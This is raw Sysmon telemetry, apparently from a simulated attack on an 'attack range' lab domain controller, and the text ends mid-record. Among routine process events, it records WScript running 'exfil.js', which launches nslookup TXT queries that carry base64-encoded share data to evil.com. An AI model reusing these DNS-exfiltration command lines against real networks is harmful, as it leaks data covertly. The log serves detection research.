14:21:49.151{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18FD-629A-1046-000000005F02}7236C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214844Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.151{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FD-629A-1046-000000005F02}7236C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214843Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.151{2E1864BB-18FD-629A-1046-000000005F02}72365176C:\Windows\system32\conhost.exe{2E1864BB-18FD-629A-0F46-000000005F02}5380C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214842Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.151{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FD-629A-1046-000000005F02}7236C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214841Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.135{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214840Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.135{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214839Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.135{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214838Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.135{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214837Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.135{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FD-629A-0F46-000000005F02}5380C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214836Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.135{2E1864BB-18E0-629A-6742-000000005F02}39763448C:\Windows\System32\WScript.exe{2E1864BB-18FD-629A-0F46-000000005F02}5380C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214835Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.145{2E1864BB-18FD-629A-0F46-000000005F02}5380C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgSVBD evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmksnd.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000214834Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.135{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nltojd.tmpMD5=8243B24CCFEB9BB233B3379BEC4F1A23,SHA256=640266002D96A03904AAA3A39C38EBB9E7EB5FB5F8774575491C759B17BE418A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214833Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.104{2E1864BB-18FD-629A-0D46-000000005F02}57726220C:\Windows\system32\conhost.exe{2E1864BB-18FD-629A-0E46-000000005F02}984C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214832Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.104{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214831Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.104{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214830Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.104{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214829Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.104{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214828Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.104{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FD-629A-0E46-000000005F02}984C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214827Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.104{2E1864BB-18FD-629A-0C46-000000005F02}60121676C:\Windows\system32\cmd.exe{2E1864BB-18FD-629A-0E46-000000005F02}984C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214826Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.113{2E1864BB-18FD-629A-0E46-000000005F02}984C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FD-629A-0C46-000000005F02}6012C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltojd.tmp 2>&1 354300x8000000000000000214825Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.259{00000000-0000-0000-0000-000000000000}2040<unknown process>-udptruefalse127.0.0.1-51193-false127.0.0.1-53domain 354300x8000000000000000214824Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.259{00000000-0000-0000-0000-000000000000}2040<unknown process>-udpfalsefalse127.0.0.1-51192-false127.0.0.1-53domain 354300x8000000000000000214823Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.259{00000000-0000-0000-0000-000000000000}2040<unknown process>-udptruefalse127.0.0.1-51192-false127.0.0.1-53domain 354300x8000000000000000214822Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.258{00000000-0000-0000-0000-000000000000}2040<unknown process>-udpfalsefalse127.0.0.1-51191-false127.0.0.1-53domain 354300x8000000000000000214821Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.258{00000000-0000-0000-0000-000000000000}2040<unknown process>-udptruefalse127.0.0.1-51191-false127.0.0.1-53domain 354300x8000000000000000214820Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.088{00000000-0000-0000-0000-000000000000}2764<unknown process>-udpfalsefalse127.0.0.1-51187-false127.0.0.1-53domain 10341000x8000000000000000214819Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.082{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18FD-629A-0D46-000000005F02}5772C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214818Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.082{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FD-629A-0D46-000000005F02}5772C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214817Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.082{2E1864BB-18FD-629A-0D46-000000005F02}57726220C:\Windows\system32\conhost.exe{2E1864BB-18FD-629A-0C46-000000005F02}6012C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214816Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.067{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FD-629A-0D46-000000005F02}5772C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214815Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.067{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214814Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.067{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214813Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.067{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214812Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.067{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214811Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.067{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FD-629A-0C46-000000005F02}6012C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214810Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.067{2E1864BB-18E0-629A-6742-000000005F02}39767660C:\Windows\System32\WScript.exe{2E1864BB-18FD-629A-0C46-000000005F02}6012C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214809Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.075{2E1864BB-18FD-629A-0C46-000000005F02}6012C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiA= evil.com > 